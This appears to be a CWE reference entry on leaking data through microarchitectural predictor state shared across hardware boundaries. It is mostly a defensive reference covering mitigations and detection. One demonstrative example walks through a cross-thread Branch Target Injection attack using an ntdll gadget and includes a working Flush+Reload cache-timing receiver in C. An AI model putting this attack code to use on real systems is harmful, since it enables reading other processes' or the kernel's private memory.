CWE-1423: Exposure of Sensitive Information caused by Shared Microarchitectural Predictor State that Influences Transient Execution

Weakness ID: 1423
Vulnerability Mapping: ALLOWED (this CWE ID may be used to map to real-world vulnerabilities)
Abstraction: Base (a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention)
+ Description
Shared microarchitectural predictor state may allow code to influence transient execution across a hardware boundary, potentially exposing data that is accessible beyond the boundary over a covert channel.
+ Extended Description

Many commodity processors have Instruction Set Architecture (ISA) features that protect software components from one another. These features can include memory segmentation, virtual memory, privilege rings, trusted execution environments, and virtual machines, among others. For example, virtual memory provides each process with its own address space, which prevents processes from accessing each other's private data. Many of these features can be used to form hardware-enforced security boundaries between software components.

When separate software components (for example, two processes) share microarchitectural predictor state across a hardware boundary, code in one component may be able to influence microarchitectural predictor behavior in another component. If the predictor can cause transient execution, the shared predictor state may allow an attacker to influence transient execution in a victim, and in a manner that could allow the attacker to infer private data from the victim by monitoring observable discrepancies (CWE-203) in a covert channel [REF-1400].

Predictor state may be shared when the processor transitions from one component to another (for example, when a process makes a system call to enter the kernel). Many commodity processors have features which prevent microarchitectural predictions that occur before a boundary from influencing predictions that occur after the boundary.

Predictor state may also be shared between hardware threads, for example, sibling hardware threads on a processor that supports simultaneous multithreading (SMT). This sharing may be benign if the hardware threads are simultaneously executing in the same software component, or it could expose a weakness if one sibling is a malicious software component, and the other sibling is a victim software component. Processors that share microarchitectural predictors between hardware threads may have features which prevent microarchitectural predictions that occur on one hardware thread from influencing predictions that occur on another hardware thread.

Features that restrict predictor state sharing across transitions or between hardware threads may be always-on, on by default, or may require opt-in from software.
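
As an informal illustration of why untagged shared predictor state is dangerous, the following minimal C model shows a branch target buffer whose lookup ignores which context trained an entry, so a prediction installed by one context is served to another context that branches from an aliasing address. This is a sketch only; the structure, sizes, and indexing function are hypothetical and do not describe any real processor.

(informative)
Example Language: C

/* Hypothetical, simplified model of an untagged branch target buffer (BTB)
 * shared by two contexts. Names, sizes, and the indexing function are
 * illustrative and do not describe any real processor. Because the lookup
 * ignores which context trained an entry, a prediction installed by an
 * "attacker" context is served to a "victim" context that branches from an
 * aliasing address. */
#include <stdint.h>
#include <stdio.h>

#define BTB_ENTRIES 256

typedef struct {
    uint64_t branch_addr;   /* address of the branch site that trained it */
    uint64_t target;        /* predicted branch target                    */
    int      valid;
} btb_entry_t;

static btb_entry_t btb[BTB_ENTRIES];   /* shared: no context identifier */

static size_t btb_index(uint64_t branch_addr)
{
    return (size_t)(branch_addr >> 2) % BTB_ENTRIES;   /* ignores context */
}

/* Called when a context resolves an indirect branch: install a prediction. */
static void btb_train(uint64_t branch_addr, uint64_t target)
{
    size_t i = btb_index(branch_addr);
    btb[i].branch_addr = branch_addr;
    btb[i].target = target;
    btb[i].valid = 1;
}

/* Called when any context fetches an indirect branch: consume a prediction. */
static uint64_t btb_predict(uint64_t branch_addr, uint64_t fallback)
{
    size_t i = btb_index(branch_addr);
    return (btb[i].valid && btb[i].branch_addr == branch_addr)
               ? btb[i].target : fallback;
}

int main(void)
{
    /* Attacker context trains a branch located at the same virtual address
     * as the victim's indirect branch in the victim's own address space.  */
    btb_train(0x401000, 0xbad0bad0);            /* attacker-chosen target */

    /* Victim context later looks up the aliasing address and is steered
     * toward the attacker-chosen target until the misprediction resolves. */
    printf("victim prediction: 0x%llx\n",
           (unsigned long long)btb_predict(0x401000, 0x402000));
    return 0;
}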

+ Relationships
+ Relevant to the view "Research Concepts" (CWE-1000)
Nature    Type   ID     Name
ChildOf   Base   1420   Exposure of Sensitive Information during Transient Execution
+ Relevant to the view "Hardware Design" (CWE-1194)
Nature    Type   ID     Name
ChildOf   Base   1420   Exposure of Sensitive Information during Transient Execution
+ Modes Of Introduction
Phase: Architecture and Design

This weakness can be introduced during hardware architecture and design if predictor state is not properly isolated between modes (for example, user mode and kernel mode), if predictor state is not isolated between hardware threads, or if it is not isolated between other kinds of execution contexts supported by the processor.

Phase: Implementation

This weakness can be introduced during system software implementation if predictor-state-sanitizing operations (for example, the indirect branch prediction barrier on Intel x86) are not invoked when switching from one context to another.

Phase: System Configuration

This weakness can be introduced if the system has not been configured according to the hardware vendor's recommendations for mitigating the weakness.

+ Applicable Platforms

Languages

Class: Not Language-Specific (Undetermined Prevalence)

Operating Systems

Class: Not OS-Specific (Undetermined Prevalence)

Architectures

Class: Not Architecture-Specific (Undetermined Prevalence)

Technologies

Microcontroller Hardware (Undetermined Prevalence)

Processor Hardware (Undetermined Prevalence)

Memory Hardware (Undetermined Prevalence)

Class: System on Chip (Undetermined Prevalence)

+ Common Consequences
Scope: Confidentiality
Technical Impact: Read Memory
Likelihood: Medium
+ Demonstrative Examples

Example 1

Branch Target Injection (BTI) is a vulnerability that can allow an SMT hardware thread to maliciously train the indirect branch predictor state that is shared with its sibling hardware thread. A cross-thread BTI attack requires the attacker to find a vulnerable code sequence within the victim software. For example, the authors of [REF-1415] identified the following code sequence in the Windows library ntdll.dll:

(bad code)
Example Language: x86 Assembly

example_code_sequence:
  adc edi,dword ptr [ebx+edx+13BE13BDh]
  adc dl,byte ptr [edi]
  ...
indirect_branch_site:
  jmp dword ptr [rsi]   ; at this point the attacker knows edx and controls edi and ebx

To successfully exploit this code sequence to disclose the victim's private data, the attacker must also be able to find an indirect branch site within the victim, where the attacker controls the values in edi and ebx, and the attacker knows the value in edx as shown above at the indirect branch site.

A proof-of-concept cross-thread BTI attack might proceed as follows:

  1. The attacker thread and victim thread must be co-scheduled on the same physical processor core.
  2. The attacker thread must train the shared branch predictor so that when the victim thread reaches indirect_branch_site, the jmp instruction will be predicted to target example_code_sequence instead of the correct architectural target. The training procedure may vary by processor, and the attacker may need to reverse-engineer the branch predictor to identify a suitable training algorithm.
  3. This step assumes that the attacker can control some values in the victim program, specifically the values in edi and ebx at indirect_branch_site. When the victim reaches indirect_branch_site, the processor will (mis)predict example_code_sequence as the target and (transiently) execute the adc instructions. If the attacker chooses ebx so that ebx = m - 0x13BE13BDh - edx, then the first adc will load 32 bits from address m in the victim's address space and add *m (the data loaded from m) to the attacker-controlled base address in edi. The second adc instruction accesses a location in memory whose address corresponds to *m.
  4. The adversary uses a covert channel analysis technique such as Flush+Reload ([REF-1416]) to infer the value of the victim's private data *m.
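
The covert channel analysis in step 4 can be sketched with a minimal Flush+Reload receiver. The code below assumes an x86 processor where clflush and rdtscp are usable from user space; the probe array layout, page-sized stride, and timing threshold are illustrative values that a real attack would calibrate, and the victim's transient access to the probe array is only indicated by a comment.

(attack code)
Example Language: C

/* Minimal Flush+Reload receiver for step 4, assuming an x86 processor where
 * clflush and rdtscp are usable from user space. The probe array, page-sized
 * stride, and timing threshold are illustrative; a real attack calibrates the
 * threshold and arranges for the probe memory to be touched by the victim's
 * transient access (e.g., via shared pages). */
#include <stdint.h>
#include <stdio.h>
#include <x86intrin.h>          /* _mm_clflush, _mm_mfence, __rdtscp */

#define SLOTS   256             /* one slot per possible byte value of *m */
#define STRIDE  4096            /* one page per slot to defeat prefetching */

static uint8_t probe[SLOTS * STRIDE];

static uint64_t time_access(volatile uint8_t *p)
{
    unsigned int aux;
    uint64_t t0 = __rdtscp(&aux);
    (void)*p;                               /* load the probed cache line */
    uint64_t t1 = __rdtscp(&aux);
    return t1 - t0;
}

int main(void)
{
    const uint64_t threshold = 120;         /* cycles; must be calibrated */

    /* Flush: evict every probe slot from the cache. */
    for (int i = 0; i < SLOTS; i++)
        _mm_clflush(&probe[i * STRIDE]);
    _mm_mfence();

    /* ... the victim transiently executes the gadget here, loading
     *     probe[(*m) * STRIDE] and leaving that line cached ... */

    /* Reload: a fast access reveals which slot the victim touched. */
    for (int i = 0; i < SLOTS; i++)
        if (time_access(&probe[i * STRIDE]) < threshold)
            printf("candidate value of *m: 0x%02x\n", i);

    return 0;
}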

Example 2

BTI can also allow software in one execution context to maliciously train branch predictor entries that can be used in another context. For example, on some processors user-mode software may be able to train predictor entries that can also be used after transitioning into kernel mode, such as after invoking a system call. This vulnerability does not necessarily require SMT and may instead be performed in synchronous steps, though it does require the attacker to find an exploitable code sequence in the victim's code, for example, in the kernel.

+ Observed Examples
(Branch Target Injection, BTI, Spectre v2): Shared microarchitectural indirect branch predictor state may allow code to influence transient execution across a process, VM, or privilege boundary, potentially exposing data that is accessible beyond the boundary.
(Branch History Injection, BHI, Spectre-BHB): Shared branch history state may allow user-mode code to influence transient execution in the kernel, potentially exposing kernel data over a covert channel.
(RSB underflow, Retbleed): Shared return stack buffer state may allow code that executes before a prediction barrier to influence transient execution after the prediction barrier, potentially exposing data that is accessible beyond the barrier over a covert channel.
+ Potential Mitigations

Phase: Architecture and Design

The hardware designer can attempt to prevent transient execution from causing observable discrepancies in specific covert channels.

Phase: Architecture and Design

Hardware designers may choose to use microarchitectural bits to tag predictor entries. For example, each predictor entry may be tagged with a kernel-mode bit which, when set, indicates that the predictor entry was created in kernel mode. The processor can use this bit to enforce that predictions in the current mode must have been trained in the current mode. This can prevent malicious cross-mode training, such as when user-mode software attempts to create predictor entries that influence transient execution in the kernel. Predictor entry tags can also be used to associate each predictor entry with the SMT thread that created it, and thus the processor can enforce that each predictor entry can only be used by the SMT thread that created it. This can prevent an SMT thread from using predictor entries crafted by a malicious sibling SMT thread.

Effectiveness: Moderate

Note:

Tagging can be highly effective for predictor state that is composed of discrete elements, such as an array of recently visited branch targets. Predictor state can also have other representations that are not conducive to tagging. For example, some processors keep a compressed digest of branch history that does not contain discrete elements that can be individually tagged.
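
A minimal sketch of the tagging idea is shown below, using hypothetical structure and field names rather than any vendor's actual design: each predictor entry records the privilege mode and SMT thread that created it, and a prediction is consumed only when both tags match the current consumer.

(good code)
Example Language: C

/* Hypothetical model of the tagging mitigation (not any vendor's design):
 * each predictor entry records the privilege mode and SMT thread that
 * created it, and a prediction is consumed only when both tags match. */
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

typedef struct {
    uint64_t branch_addr;
    uint64_t target;
    uint8_t  kernel_mode;     /* 1 if the entry was trained in kernel mode */
    uint8_t  smt_thread_id;   /* hardware thread that created the entry    */
    bool     valid;
} tagged_entry_t;

/* The front end uses a prediction only if the creator's tags match the
 * current consumer; otherwise it falls back to "no prediction". */
static bool entry_usable(const tagged_entry_t *e,
                         uint8_t cur_kernel_mode, uint8_t cur_smt_thread)
{
    return e->valid
        && e->kernel_mode   == cur_kernel_mode
        && e->smt_thread_id == cur_smt_thread;
}

int main(void)
{
    /* Entry trained by user-mode code on SMT thread 0 ... */
    tagged_entry_t e = { 0x401000, 0xbad0bad0, 0 /* user */, 0, true };

    /* ... is rejected when kernel-mode code on SMT thread 1 consumes it. */
    printf("usable by kernel on thread 1? %s\n",
           entry_usable(&e, 1, 1) ? "yes" : "no");
    return 0;
}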

Phase: Architecture and Design

Hardware designers may choose to sanitize microarchitectural predictor state (for example, branch prediction history) when the processor transitions to a different context, for example, whenever a system call is invoked. Alternatively, the hardware may expose instruction(s) that allow software to sanitize predictor state according to the user's threat model. For example, this can allow operating system software to sanitize predictor state when performing a context switch from one process to another.

Effectiveness: Moderate

Note:

This technique may not be able to mitigate weaknesses that arise from predictor state that is shared across SMT threads. Sanitizing predictor state on context switches may also negatively impact performance, either by removing predictor entries that could be reused when returning to the previous context, or by slowing down the context switch itself.

Phase: Implementation

System software can mitigate this weakness by invoking predictor-state-sanitizing operations (for example, the indirect branch prediction barrier on Intel x86) when switching from one context to another, according to the hardware vendor's recommendations.

Effectiveness: Moderate

Note:

This technique may not be able to mitigate weaknesses that arise from predictor state shared across SMT threads. Sanitizing predictor state may also negatively impact performance in some circumstances.
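
As a sketch of this mitigation on x86, the fragment below issues an indirect branch prediction barrier (IBPB) by writing the IA32_PRED_CMD MSR from a hypothetical context-switch hook. The MSR number and bit position follow Intel's published software interface, but the surrounding flow is illustrative only; this code must execute in kernel mode, and real system software first confirms IBPB support via CPUID enumeration.

(good code)
Example Language: C

/* Sketch of issuing an indirect branch prediction barrier (IBPB) from a
 * hypothetical context-switch hook by writing the IA32_PRED_CMD MSR. The MSR
 * number and bit position follow Intel's published interface; the surrounding
 * flow is illustrative. This must execute in kernel mode, and real system
 * software first confirms IBPB support via CPUID enumeration. */
#include <stdint.h>

#define MSR_IA32_PRED_CMD  0x00000049u
#define PRED_CMD_IBPB      (1u << 0)

static inline void wrmsr(uint32_t msr, uint64_t value)
{
    /* wrmsr takes the MSR index in ECX and the value in EDX:EAX. */
    __asm__ volatile ("wrmsr"
                      :
                      : "c"(msr), "a"((uint32_t)value),
                        "d"((uint32_t)(value >> 32))
                      : "memory");
}

/* Hypothetical hook invoked when switching to a different process: flush
 * indirect branch predictor state so entries trained by the outgoing context
 * cannot steer transient execution in the incoming context. */
void context_switch_prediction_barrier(void)
{
    wrmsr(MSR_IA32_PRED_CMD, PRED_CMD_IBPB);
}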

Phase: Build and Compilation

If the weakness is exposed by a single instruction (or a small set of instructions), then the compiler (or JIT, etc.) can be configured to prevent the affected instruction(s) from being generated. One prominent example of this mitigation is retpoline ([REF-1414]).

Effectiveness: Limited

Note:

This technique is only effective for software that is compiled with this mitigation. Additionally, an alternate instruction sequence may mitigate the weakness on some processors but not others, even when the processors share the same ISA. For example, retpoline has been documented as effective on some x86 processors, but not fully effective on other x86 processors.
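
The source code itself does not change under this mitigation; the compiler rewrites indirect branches. The sketch below shows an ordinary indirect call and, in comments, the kind of flags (for example, Clang's -mretpoline or GCC's -mindirect-branch=thunk; verify against [REF-1414] and the toolchain documentation) that cause the compiler to emit a retpoline thunk in its place.

(good code)
Example Language: C

/* The mitigation is applied at build time, not in the source. This ordinary
 * indirect call is the instruction sequence a retpoline-enabled compiler
 * rewrites; illustrative flags (verify against [REF-1414] and the toolchain
 * documentation) are:
 *
 *     clang -mretpoline              dispatch.c
 *     gcc   -mindirect-branch=thunk  dispatch.c
 *
 * With such flags the compiler emits a call to a __x86_indirect_thunk_*
 * helper instead of a raw indirect call/jmp, constraining where the branch
 * can speculate. */
#include <stdio.h>

typedef void (*handler_t)(void);

static void handler_impl(void)
{
    puts("handler invoked");
}

void dispatch(handler_t h)
{
    h();   /* indirect call: the instruction the mitigation targets */
}

int main(void)
{
    dispatch(handler_impl);
    return 0;
}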

Phase: Build and Compilation

Use control-flow integrity (CFI) techniques to constrain the behavior of instructions that redirect the instruction pointer, such as indirect branch instructions.

Effectiveness: Moderate

Note:

Some CFI techniques may not be able to constrain transient execution, even though they are effective at constraining architectural execution. Or they may be able to provide some additional protection against a transient execution weakness, but without comprehensively mitigating the weakness. For example, Clang-CFI provides strong architectural CFI properties and can make some transient execution weaknesses more difficult to exploit [REF-1398].
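
The sketch below illustrates, at the source level, what an indirect-call CFI check constrains, assuming Clang's scheme described in [REF-1398] (enabled roughly with -flto -fvisibility=hidden -fsanitize=cfi; take the exact options from that documentation).

(good code)
Example Language: C

/* Source-level view of an indirect-call CFI check, assuming Clang's scheme
 * from [REF-1398] (built roughly with -flto -fvisibility=hidden
 * -fsanitize=cfi; take the exact options from that documentation). */
#include <stdio.h>

typedef int (*int_fn_t)(int);

static int square(int x)
{
    return x * x;
}

int call_indirect(int_fn_t fn, int arg)
{
    /* With cfi-icall enabled, this call is checked: the target must be an
     * address-taken function whose static type matches int (*)(int). A
     * forged or type-confused pointer traps instead of redirecting control
     * flow, though (as noted above) transient execution may still be only
     * partially constrained. */
    return fn(arg);
}

int main(void)
{
    printf("%d\n", call_indirect(square, 7));
    return 0;
}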

Phase: Build and Compilation

Use software techniques (including the use of serialization instructions) that are intended to reduce the number of instructions that can be executed transiently after a processor event or misprediction.

Effectiveness: Incidental

Note:

Some transient execution weaknesses can be exploited even if a single instruction is executed transiently after a processor event or mis-prediction. This mitigation strategy has many other pitfalls that prevent it from eliminating this weakness entirely. For example, see [REF-1389].
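
A minimal sketch of the serialization approach on x86 is shown below, using the _mm_lfence() intrinsic immediately before an indirect call; as [REF-1389] explains for the analogous LFENCE/JMP sequence, this narrows but does not reliably close the transient execution window.

(informative)
Example Language: C

/* Sketch of the serialization approach on x86: place a speculation barrier
 * (_mm_lfence) immediately before an indirect call so that little executes
 * transiently before the branch target is resolved. [REF-1389] analyzes why
 * the analogous LFENCE/JMP sequence does not fully close the window. */
#include <emmintrin.h>   /* _mm_lfence (SSE2) */
#include <stdio.h>

typedef void (*handler_t)(void);

static void handler_impl(void)
{
    puts("handler invoked");
}

void dispatch_with_barrier(handler_t h)
{
    /* lfence: later instructions do not begin execution until prior
     * instructions have completed locally. */
    _mm_lfence();
    h();
}

int main(void)
{
    dispatch_with_barrier(handler_impl);
    return 0;
}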

Phase: System Configuration

Some systems may allow the user to disable predictor sharing. For example, this could be a BIOS configuration, or a model-specific register (MSR) that can be configured by the operating system or virtual machine monitor.

Effectiveness: Moderate

Note:

Disabling predictor sharing can negatively impact performance for some workloads that benefit from shared predictor state.
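
On Linux systems, the kernel reports the configured mitigation state through sysfs. The sketch below, which assumes the standard /sys/devices/system/cpu/vulnerabilities interface is present, simply reads and prints the spectre_v2 entry so that an administrator can confirm the effect of BIOS or kernel configuration choices.

(informative)
Example Language: C

/* Sketch, assuming a Linux system, of checking how the running kernel has
 * configured the branch-target-injection mitigation. The sysfs path is the
 * standard Linux "vulnerabilities" interface; the reported string is
 * kernel-defined (e.g., "Mitigation: ..." or "Vulnerable"). */
#include <stdio.h>

int main(void)
{
    const char *path = "/sys/devices/system/cpu/vulnerabilities/spectre_v2";
    char line[256];

    FILE *f = fopen(path, "r");
    if (f == NULL) {
        perror(path);
        return 1;
    }
    if (fgets(line, sizeof line, f) != NULL)
        printf("spectre_v2: %s", line);
    fclose(f);
    return 0;
}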

Phase: Patching and Maintenance

The hardware vendor may provide a patch to, for example, sanitize predictor state when the processor transitions to a different context, or to prevent predictor entries from being shared across SMT threads. A patch may also introduce new ISA that allows software to toggle a mitigation.

Effectiveness: Moderate

Note:

This mitigation may only be fully effective if the patch prevents predictor sharing across all contexts that are affected by the weakness. Additionally, sanitizing predictor state and/or preventing shared predictor state can negatively impact performance in some circumstances.

Phase: Documentation

If a hardware feature can allow microarchitectural predictor state to be shared between contexts, SMT threads, or other architecturally defined boundaries, the hardware designer may opt to disclose this behavior in architecture documentation. This documentation can inform users about potential consequences and effective mitigations.

Effectiveness: High

Phase: Requirements

Processor designers, system software vendors, or other agents may choose to restrict the ability of unprivileged software to access high-resolution timers that are commonly used to monitor covert channels.
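
A toy illustration of the timer-coarsening idea is given below: time is exposed to untrusted code only at a reduced granularity. The 5-microsecond bucket size is an arbitrary illustrative value, and deployed defenses (for example, in browsers) also add jitter and limit other timing primitives.

(informative)
Example Language: C

/* Toy illustration of restricting timer resolution: time is exposed to
 * untrusted code only in coarse buckets. The 5-microsecond bucket size is an
 * arbitrary illustrative value; deployed defenses (e.g., in browsers) also
 * add jitter and limit other timing primitives. */
#include <stdint.h>
#include <stdio.h>
#include <time.h>

uint64_t coarse_time_ns(void)
{
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);

    uint64_t ns = (uint64_t)ts.tv_sec * 1000000000ull + (uint64_t)ts.tv_nsec;
    const uint64_t bucket_ns = 5000;        /* 5 microseconds */
    return ns - (ns % bucket_ns);
}

int main(void)
{
    printf("coarse timestamp: %llu ns\n",
           (unsigned long long)coarse_time_ns());
    return 0;
}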

+ Detection Methods

Manual Analysis

This weakness can be detected in hardware by manually inspecting processor specifications. Features that exhibit this weakness may have microarchitectural predictor state that is shared between hardware threads, execution contexts (for example, user and kernel), or other components that may host mutually distrusting software (or firmware, etc.).

Effectiveness: Moderate

Note: Manual analysis may not reveal all weaknesses in a processor specification and should be combined with other detection methods to improve coverage.

Automated Analysis

Software vendors can release tools that detect the presence of known weaknesses on a processor. For example, some of these tools can attempt to transiently execute a vulnerable code sequence and detect whether code successfully leaks data in a manner consistent with the weakness under test. Alternatively, some hardware vendors provide enumeration for the presence of a weakness (or lack of a weakness). These enumeration bits can be checked and reported by system software. For example, Linux supports these checks for many commodity processors:

$ cat /proc/cpuinfo | grep bugs | head -n 1

bugs : cpu_meltdown spectre_v1 spectre_v2 spec_store_bypass l1tf mds swapgs taa itlb_multihit srbds mmio_stale_data retbleed

Effectiveness: High

Note: This method can be useful for detecting whether a processor is affected by known weaknesses, but it may not be useful for detecting unknown weaknesses.
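
In addition to the /proc/cpuinfo check above, software can query the hardware enumeration directly. The sketch below assumes an x86 processor and GCC/Clang's <cpuid.h>; the bit positions (CPUID leaf 07H, EDX bit 26 for IBRS/IBPB and bit 27 for STIBP) follow Intel's published interface and should be verified against the vendor documentation for the processor under test.

(informative)
Example Language: C

/* Complementary check of the hardware enumeration itself, assuming an x86
 * processor and GCC/Clang's <cpuid.h>. Bit positions follow Intel's
 * published CPUID leaf 07H interface (EDX bit 26: IBRS/IBPB, bit 27: STIBP);
 * verify them against the documentation for the processor under test. */
#include <cpuid.h>
#include <stdio.h>

int main(void)
{
    unsigned int eax = 0, ebx = 0, ecx = 0, edx = 0;

    if (!__get_cpuid_count(7, 0, &eax, &ebx, &ecx, &edx)) {
        puts("CPUID leaf 07H not supported");
        return 1;
    }

    printf("IBRS/IBPB enumerated: %s\n", (edx & (1u << 26)) ? "yes" : "no");
    printf("STIBP enumerated:     %s\n", (edx & (1u << 27)) ? "yes" : "no");
    return 0;
}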

Automated Analysis

This weakness can be detected in hardware by employing static or dynamic taint analysis methods [REF-1401]. These methods can label each predictor entry (or prediction history, etc.) according to the processor context that created it. Taint analysis or information flow analysis can then be applied to detect when predictor state created in one context can influence predictions made in another context.

Effectiveness: Moderate

Note: Automated static or dynamic taint analysis may not reveal all weaknesses in a processor specification and should be combined with other detection methods to improve coverage.
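
The core check behind such analyses can be sketched as follows: label every predictor entry with the context that produced it and flag any prediction consumed by a different context. The C model below is a toy stand-in; real methodologies such as [REF-1401] apply this idea to RTL or formal models rather than software.

(informative)
Example Language: C

/* Toy stand-in for the taint-analysis check: every predictor entry carries a
 * label naming the context that produced it, and any prediction consumed by
 * a different context is flagged. Real methodologies such as [REF-1401]
 * apply this idea to RTL or formal models rather than C code. */
#include <stdint.h>
#include <stdio.h>

typedef struct {
    uint64_t target;
    uint32_t producer_ctx;   /* taint label: context that trained the entry */
    int      valid;
} pred_entry_t;

static void check_prediction(const pred_entry_t *e, uint32_t consumer_ctx)
{
    if (e->valid && e->producer_ctx != consumer_ctx)
        fprintf(stderr,
                "cross-context influence: entry trained by context %u "
                "consumed by context %u\n", e->producer_ctx, consumer_ctx);
}

int main(void)
{
    pred_entry_t e = { 0xbad0bad0, 0 /* user context */, 1 };
    check_prediction(&e, 1 /* kernel context */);   /* flags the violation */
    return 0;
}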
+ Memberships
Nature     Type       ID     Name
MemberOf   Category   1416   Comprehensive Categorization: Resource Lifecycle Management
+ Vulnerability Mapping Notes

Usage: ALLOWED

(this CWE ID could be used to map to real-world vulnerabilities)

Reason: Acceptable-Use

Rationale:

This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.

Comments:

Use only when the weakness allows code in one processor context to influence the predictions of code in another processor context via predictor state that is shared between the two contexts. For example, Branch Target Injection, an instance of CWE-1423, can be mitigated by tagging each indirect branch predictor entry according to the processor context in which the entry was created, thus preventing entries created in one context from being used in a different context. However, the mitigated indirect branch predictor can still expose different weaknesses where malicious predictor entries created in one context are used later in the same context (context tags cannot prevent this). One such example is Intra-mode Branch Target Injection. Weaknesses of this sort can map to CWE-1420.
Suggestion:
CWE-ID     Comment
CWE-1420   If a weakness involves a microarchitectural predictor whose state is not shared across processor contexts, then CWE-1420 may be more appropriate for the mapping task.
+ References
[REF-1414] Intel Corporation. "Retpoline: A Branch Target Injection Mitigation". 2022-08-22. <https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/technical-documentation/retpoline-branch-target-injection-mitigation.html>. URL validated: 2023-02-13.
[REF-1415] Paul Kocher, Jann Horn, Anders Fogh, Daniel Genkin, Daniel Gruss, Werner Haas, Mike Hamburg, Moritz Lipp, Stefan Mangard, Thomas Prescher, Michael Schwarz and Yuval Yarom. "Spectre Attacks: Exploiting Speculative Execution". 2019-05. <https://spectreattack.com/spectre.pdf>. URL validated: 2024-02-14.
[REF-1416] Yuval Yarom and Katrina Falkner. "Flush+Reload: A High Resolution, Low Noise, L3 Cache Side-Channel Attack". 2014. <https://www.usenix.org/system/files/conference/usenixsecurity14/sec14-paper-yarom.pdf>. URL validated: 2023-02-13.
[REF-1398] The Clang Team. "Control Flow Integrity". <https://clang.llvm.org/docs/ControlFlowIntegrity.html>. URL validated: 2024-02-13.
[REF-1389] Alyssa Milburn, Ke Sun and Henrique Kawakami. "You Cannot Always Win the Race: Analyzing the LFENCE/JMP Mitigation for Branch Target Injection". 2022-03-08. <https://arxiv.org/abs/2203.04277>. URL validated: 2024-02-22.
[REF-1400] Intel Corporation. "Refined Speculative Execution Terminology". 2022-03-11. <https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/best-practices/refined-speculative-execution-terminology.html>. URL validated: 2024-02-13.
[REF-1401] Neta Bar Kama and Roope Kaivola. "Hardware Security Leak Detection by Symbolic Simulation". 2021-11. <https://ieeexplore.ieee.org/document/9617727>. URL validated: 2024-02-13.
+ Content History
+ Submissions
Submission Date: 2023-09-19 (CWE 4.14, 2024-02-29)
Submitter: Scott D. Constable, Intel Corporation
+ Contributions
Contribution Date: 2024-01-22 (CWE 4.14, 2024-02-29)
Contributor: David Kaplan, AMD (Member of Microarchitectural Weaknesses Working Group)

Contribution Date: 2024-01-22 (CWE 4.14, 2024-02-29)
Contributors: Rafael Dossantos, Abraham Fernandez Rubio, Alric Althoff, Lyndon Fawcett, Arm (Members of Microarchitectural Weaknesses Working Group)

Contribution Date: 2024-01-22 (CWE 4.14, 2024-02-29)
Contributor: Jason Oberg, Cycuity (Member of Microarchitectural Weaknesses Working Group)

Contribution Date: 2024-01-22 (CWE 4.14, 2024-02-29)
Contributor: Priya B. Iyer, Intel Corporation (Member of Microarchitectural Weaknesses Working Group)

Contribution Date: 2024-01-22 (CWE 4.14, 2024-02-29)
Contributor: Nicole Fern, Riscure (Member of Microarchitectural Weaknesses Working Group)
Page Last Updated: February 29, 2024